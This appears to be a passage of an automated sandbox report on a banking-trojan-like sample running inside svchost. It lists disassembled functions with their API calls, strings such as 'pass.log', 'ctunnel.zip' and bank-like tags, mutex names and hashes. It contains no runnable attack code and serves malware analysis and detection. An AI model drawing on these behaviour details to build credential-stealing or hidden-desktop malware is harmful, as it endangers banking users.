                                                                                                                                                                                                            Function 02C84010 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 210stringCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(02C93910,?,0000001C), ref: 02C84060
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(02C93910,?,0000001C), ref: 02C8408C
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(02C93910,0000001C,0000001C), ref: 02C840B3
                                                                                                                                                                                                            • IsBadReadPtr.KERNEL32(?,00000005), ref: 02C840E4
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02C8410D
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,Content-Length: ), ref: 02C84125
                                                                                                                                                                                                            • StrToIntA.SHLWAPI(-00000010), ref: 02C84133
                                                                                                                                                                                                            • memcpy.MSVCRT(00000000,?,00000004), ref: 02C84165
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: QueryVirtual$Readmemcpystrstr
                                                                                                                                                                                                            • String ID: $Content-Length: $POST
                                                                                                                                                                                                            • API String ID: 2509092961-2076583852
                                                                                                                                                                                                            • Opcode ID: 98e3f5e6023505e43740f07631d97470b1c8b4de8df814408e7af2995d1372bf
                                                                                                                                                                                                            • Instruction ID: 20fb5f77d205ca073ff0fd67f8c3b62ce2f308a28ed9b6ee4e61b5401f3d3b17
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 98e3f5e6023505e43740f07631d97470b1c8b4de8df814408e7af2995d1372bf
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C6718071D40256AFDB24EFA8DC84BAEBBB9FF88704F108669E814E7640D7309914CF91
                                                                                                                                                                                                            Function 02C8CBC0 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 167stringthreadCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C8CBE1
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,<L>,?,00000000,?), ref: 02C8CC19
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA3E6), ref: 02C8CC4D
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA3E6), ref: 02C8CC83
                                                                                                                                                                                                            • PathFileExistsA.SHLWAPI(00000000,6D1DA3E6), ref: 02C8CCC9
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C8A390,00000000,00000000,00000000), ref: 02C8CD48
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C8CD60
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C8CD71
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02C8CD97
                                                                                                                                                                                                            • memcpy.MSVCRT(00000000,00000000,02C87A4D), ref: 02C8CDD4
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Path$BackslashHandle$CloseCreateExistsFileInformationThreadmemcpymemsetstrstr
                                                                                                                                                                                                            • String ID: 6D1DA3E6$<L>$POST$bsi.dll$pass.log
                                                                                                                                                                                                            • API String ID: 4177962767-680892499
                                                                                                                                                                                                            • Opcode ID: 2a9d3f0de192a04b5262e6f3fb27019717aec26fc3c489003c4e6fc2897fdf56
                                                                                                                                                                                                            • Instruction ID: 06d8eef77a4d09b74bfb68f91aa851fec4f1dbc0fe938ed8cc18d0de3af1fdc7
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2a9d3f0de192a04b5262e6f3fb27019717aec26fc3c489003c4e6fc2897fdf56
                                                                                                                                                                                                            • Instruction Fuzzy Hash: AC516F31D406455BD716BF34EC097E67BA9EF85308F14865BD80897280EB709B58CFE0
                                                                                                                                                                                                            Function 02C8B888 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 162COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA3E6), ref: 02C8B8A7
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8B8E1
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C8B8EB
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C8B8F3
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8B904
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C8B90B
                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?), ref: 02C8B941
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?), ref: 02C8B980
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA3E6,?,?), ref: 02C8B9C7
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Path$BackslashDirectoryErrorLast$AdminAttributesCreateCurrentFileFolderMakeSystemUser
                                                                                                                                                                                                            • String ID: 6D1DA3E6$\$ctunnel.zip$path_ctunnel.txt
                                                                                                                                                                                                            • API String ID: 2545201083-2670487512
                                                                                                                                                                                                            • Opcode ID: 597e81aea07d56e163b133f732db12b9ba6d08a01c7eba91b56a39189bb5b505
                                                                                                                                                                                                            • Instruction ID: d0a2208008877b16d15c25a98c7cfc1f1bfd6b29ceef1f59d470caa040ab772e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 597e81aea07d56e163b133f732db12b9ba6d08a01c7eba91b56a39189bb5b505
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8A51F6309046598FDB16DF24A858BE6BBF9EF86308F14C6D4D8C9D7211DB70DA89CB90
                                                                                                                                                                                                            Function 02C783D0 Relevance: 26.3, APIs: 14, Strings: 1, Instructions: 84windowsynchronizationsleepCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SetThreadDesktop.USER32(?), ref: 02C783E2
                                                                                                                                                                                                              • Part of subcall function 02C77FB0: SelectObject.GDI32(00000000,00000000), ref: 02C77FCA
                                                                                                                                                                                                              • Part of subcall function 02C77FB0: DeleteObject.GDI32(00000000), ref: 02C77FD9
                                                                                                                                                                                                              • Part of subcall function 02C77FB0: DeleteDC.GDI32(00000000), ref: 02C77FE7
                                                                                                                                                                                                              • Part of subcall function 02C77FB0: SelectObject.GDI32(?,00000000), ref: 02C77FF7
                                                                                                                                                                                                              • Part of subcall function 02C77FB0: DeleteObject.GDI32(00000000), ref: 02C77FFF
                                                                                                                                                                                                              • Part of subcall function 02C77FB0: DeleteDC.GDI32(?), ref: 02C78008
                                                                                                                                                                                                              • Part of subcall function 02C77FB0: GetDC.USER32(00000000), ref: 02C7800C
                                                                                                                                                                                                              • Part of subcall function 02C77FB0: CreateCompatibleDC.GDI32(00000000), ref: 02C7801B
                                                                                                                                                                                                              • Part of subcall function 02C77FB0: CreateCompatibleDC.GDI32(00000000), ref: 02C78023
                                                                                                                                                                                                              • Part of subcall function 02C77FB0: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02C78044
                                                                                                                                                                                                              • Part of subcall function 02C77FB0: SelectObject.GDI32(?,00000000), ref: 02C78053
                                                                                                                                                                                                              • Part of subcall function 02C77FB0: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02C7806E
                                                                                                                                                                                                              • Part of subcall function 02C77FB0: SelectObject.GDI32(00000000,00000000), ref: 02C7808D
                                                                                                                                                                                                              • Part of subcall function 02C77FB0: ReleaseDC.USER32(00000000,00000000), ref: 02C7809C
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000001F4), ref: 02C7840C
                                                                                                                                                                                                            • GetTopWindow.USER32(00000000), ref: 02C7841B
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C78432
                                                                                                                                                                                                            • GetWindow.USER32(00000000,00000005), ref: 02C78448
                                                                                                                                                                                                            • GetWindow.USER32(00000000), ref: 02C7844B
                                                                                                                                                                                                            • WindowFromPoint.USER32(?,?,00000000), ref: 02C7845F
                                                                                                                                                                                                            • SendMessageA.USER32(00000000,?,00000005,00000000), ref: 02C78481
                                                                                                                                                                                                            • GetIconInfo.USER32(?,?), ref: 02C7848D
                                                                                                                                                                                                            • DrawIcon.USER32(00000000,00000000,?,?), ref: 02C784AE
                                                                                                                                                                                                            • DestroyIcon.USER32(?,?,?,00000000), ref: 02C784B5
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000,?,?,00000000), ref: 02C784C2
                                                                                                                                                                                                            • SetEvent.KERNEL32(00000000,?,?,00000000), ref: 02C784CF
                                                                                                                                                                                                            • Sleep.KERNEL32(00000032), ref: 02C784DB
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Object$CompatibleCreateDeleteSelectWindow$Icon$BitmapReleaseSingleWait$DesktopDestroyDrawEventFromInfoMessageMutexPointSendSleepThread
                                                                                                                                                                                                            • String ID: P0Wu
                                                                                                                                                                                                            • API String ID: 2294845507-465009422
                                                                                                                                                                                                            • Opcode ID: 8eaec09d3a492f721f1fd1a2e24dbb4a57badda49ef832711eca34dd661be69c
                                                                                                                                                                                                            • Instruction ID: 0e43117837ab6268a9a67490fb1ba952dea540b34f6c08637e1ff143d0f09b8b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8eaec09d3a492f721f1fd1a2e24dbb4a57badda49ef832711eca34dd661be69c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2A313674A80341AFC616EBB4EC8DF1B7769EB88711F008F98F61587280DA74E921CB60
                                                                                                                                                                                                            Function 02C91AC8 Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 56sleepsynchronizationthreadCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}), ref: 02C91ADC
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02C91AED
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C91B01
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C91B0F
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C91960,00000000,00000000,00000000), ref: 02C91B24
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40), ref: 02C91B35
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C91B3A
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C91B4E
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C91B5C
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6d1da6b7), ref: 02C91B67
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40,6d1da6b7,RSTYLE), ref: 02C91B81
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02C91B8A
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Handle$Sleep$CloseInformationMutex$BackslashCreateObjectOpenPathReleaseSingleThreadWait
                                                                                                                                                                                                            • String ID: 6d1da6b7$Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}$P0Wu$RSTYLE
                                                                                                                                                                                                            • API String ID: 505831200-1961891315
                                                                                                                                                                                                            • Opcode ID: 80d8b0e3d9d2c3c3ea5e89fe1e9f890111a42fa3a035df82bacbb4d223c8714e
                                                                                                                                                                                                            • Instruction ID: 87246e837453476ab8cb3a90fcf2ea0ea17a32e8c0ab618fc1457228210fe869
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 80d8b0e3d9d2c3c3ea5e89fe1e9f890111a42fa3a035df82bacbb4d223c8714e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0711E530AC47537BF7226B648C1FF1E37886F81B29F088644F919620C1EBF485008B67
                                                                                                                                                                                                            Function 02C90B08 Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 56sleepsynchronizationthreadCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}), ref: 02C90B1C
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02C90B2D
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C90B41
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C90B4F
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C909A0,00000000,00000000,00000000), ref: 02C90B64
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40), ref: 02C90B75
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C90B7A
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C90B8E
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C90B9C
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6d1da7aa), ref: 02C90BA7
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40,6d1da7aa,RAIFF), ref: 02C90BC1
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02C90BCA
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Handle$Sleep$CloseInformationMutex$BackslashCreateObjectOpenPathReleaseSingleThreadWait
                                                                                                                                                                                                            • String ID: 6d1da7aa$Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}$P0Wu$RAIFF
                                                                                                                                                                                                            • API String ID: 505831200-2981933777
                                                                                                                                                                                                            • Opcode ID: a3da883863b471566ec0b6c46283cfe668284258ce6a3e6ebab2f37f918e3cc1
                                                                                                                                                                                                            • Instruction ID: 1bfc5cdfe3475c5b9873aec1f5fa2bb2d161855bd81734d9005c03239ff8d8f9
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a3da883863b471566ec0b6c46283cfe668284258ce6a3e6ebab2f37f918e3cc1
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7811E530AC5752BEFB225B648C1FF1E37C86F80B19F108654F955A20C1EBB0D5008B67
                                                                                                                                                                                                            Function 02C792B0 Relevance: 25.9, APIs: 17, Instructions: 354windowthreadtimeCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetAncestor.USER32(00000000,00000002,00000080,?,00000000), ref: 02C792BE
                                                                                                                                                                                                              • Part of subcall function 02C7D200: GetWindowLongA.USER32(?,000000F0), ref: 02C7D21B
                                                                                                                                                                                                              • Part of subcall function 02C7D200: GetLastActivePopup.USER32(?), ref: 02C7D229
                                                                                                                                                                                                              • Part of subcall function 02C7D200: GetWindow.USER32(00000000,00000005), ref: 02C7D243
                                                                                                                                                                                                              • Part of subcall function 02C7D200: GetWindow.USER32(00000000), ref: 02C7D246
                                                                                                                                                                                                              • Part of subcall function 02C7D200: GetWindowInfo.USER32(00000000,?), ref: 02C7D25C
                                                                                                                                                                                                              • Part of subcall function 02C7D200: GetWindow.USER32(00000000,00000004), ref: 02C7D265
                                                                                                                                                                                                              • Part of subcall function 02C7D200: GetWindow.USER32(00000000,00000003), ref: 02C7D29E
                                                                                                                                                                                                            • SendMessageA.USER32(?,00000010,00000000,00000000), ref: 02C792FF
                                                                                                                                                                                                            • GetAncestor.USER32(00000000,00000002,00000000), ref: 02C79385
                                                                                                                                                                                                            • SendMessageTimeoutA.USER32(00000000,00000021,00000000,00000001,00000002,00000064,?), ref: 02C793AC
                                                                                                                                                                                                            • PostMessageA.USER32(00000000,00000020,00000000,00000001), ref: 02C793F1
                                                                                                                                                                                                            • PostMessageA.USER32(00000000,00000000,00000000,00000001), ref: 02C79445
                                                                                                                                                                                                              • Part of subcall function 02C79160: GetTickCount.KERNEL32 ref: 02C791EA
                                                                                                                                                                                                              • Part of subcall function 02C79160: GetClassLongA.USER32(00000000,000000E6), ref: 02C7923D
                                                                                                                                                                                                            • PostMessageA.USER32(00000000,00000112,?,?), ref: 02C794AE
                                                                                                                                                                                                            • PostMessageA.USER32(00000000,0000007B,00000000,?), ref: 02C794D9
                                                                                                                                                                                                            • PostMessageA.USER32(00000000,0000007B,00000000,00000000), ref: 02C79555
                                                                                                                                                                                                            • GetSystemMenu.USER32(00000000,00000000), ref: 02C79574
                                                                                                                                                                                                            • GetMenuItemInfoA.USER32(00000000,0000F060,00000000,0000004C), ref: 02C79598
                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 02C79603
                                                                                                                                                                                                            • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 02C79616
                                                                                                                                                                                                            • PostMessageA.USER32(?,?,00000001,00000000), ref: 02C79639
                                                                                                                                                                                                            • PostMessageA.USER32(?,?,00000002,00000000), ref: 02C7965B
                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 02C79693
                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 02C796BD
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Message$Window$Post$ProcessThread$AncestorInfoLongMenuSend$ActiveClassCountItemLastPopupSystemTickTimeout
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 590198697-0
                                                                                                                                                                                                            • Opcode ID: 109e73a09647cd5770d935d94549e2aa3c30c96d773e79d3f322b559c98ccc02
                                                                                                                                                                                                            • Instruction ID: 28f0c27428ceba17d6f8045eb40a16bd936f8f5dabe40bbc738a6dc2b58ad52d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 109e73a09647cd5770d935d94549e2aa3c30c96d773e79d3f322b559c98ccc02
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 80B15832F402146AEB219A69DC89FBF7B68E7C2714F00463AFD05971C1C7798A51DBA1
                                                                                                                                                                                                            Function 02C7D680 Relevance: 25.1, APIs: 20, Instructions: 115memoryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,02C7EAE2), ref: 02C7D6A7
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C7D6AA
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02C7D6B7
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C7D6BA
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,02C7EAE2), ref: 02C7D6CA
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C7D6CD
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02C7D6DA
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C7D6DD
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,02C7EAE2), ref: 02C7D6ED
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C7D6F0
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02C7D6FD
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C7D700
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,02C7EAE2), ref: 02C7D710
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C7D713
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02C7D720
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C7D723
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(?,?,00000000,?,00000000,02C7EAE2), ref: 02C7D75D
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C7D760
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(?,?), ref: 02C7D76C
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C7D76F
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$FreeValidate
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1670920773-0
                                                                                                                                                                                                            • Opcode ID: 108202c0d4279456596ae13d8372c63828c1c486a485ed11bdd8f0e70d218377
                                                                                                                                                                                                            • Instruction ID: 96d5c744759e76c387bd5157526568cf865ea02f85927ef851269706937036c1
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 108202c0d4279456596ae13d8372c63828c1c486a485ed11bdd8f0e70d218377
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3731A172E843516BEB225F65AC88F5B77ACEFC0F56F090A19E40B93184DB31E910C6A0
                                                                                                                                                                                                            Function 02C780B0 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 132memorythreadwindowCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SetThreadDesktop.USER32(?,7556F590,755616B0,00000000), ref: 02C780BF
                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 02C780C7
                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000A), ref: 02C780D8
                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,00000008), ref: 02C780E9
                                                                                                                                                                                                            • CreateCompatibleBitmap.GDI32(00000000,00000000,?), ref: 02C78100
                                                                                                                                                                                                            • GetDIBits.GDI32(00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 02C78142
                                                                                                                                                                                                            • GetDIBits.GDI32(00000000,00000000,00000000,00000001,00000000,00000028,00000000), ref: 02C78152
                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 02C78155
                                                                                                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 02C7815E
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02C781B9
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 02C781D2
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 02C781EF
                                                                                                                                                                                                            • SetThreadDesktop.USER32(?), ref: 02C78224
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$AllocBitsCapsDesktopDeviceThread$BitmapCompatibleCreateDeleteFreeObjectRelease
                                                                                                                                                                                                            • String ID: (
                                                                                                                                                                                                            • API String ID: 188880187-3887548279
                                                                                                                                                                                                            • Opcode ID: 65efba5e38bc7ffa8d34c9547869be9fddd69222542ae85b0bba9e9c45295b16
                                                                                                                                                                                                            • Instruction ID: e1d2fbe0d8736019194c9f376290799d48bd3895722b7c8204f9a690c898a7f7
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 65efba5e38bc7ffa8d34c9547869be9fddd69222542ae85b0bba9e9c45295b16
                                                                                                                                                                                                            • Instruction Fuzzy Hash: CA415E71E81344AFDB11CFA9D889BDABBF8EF49710F1446A9E509E7280D7705911CBA0
                                                                                                                                                                                                            Function 02C8F0A0 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 98memoryfileCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetFileSizeEx.KERNEL32(?,?,00000000,00000000,75497390), ref: 02C8F0DD
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?), ref: 02C8F0F4
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02C8F0FB
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C8F10B
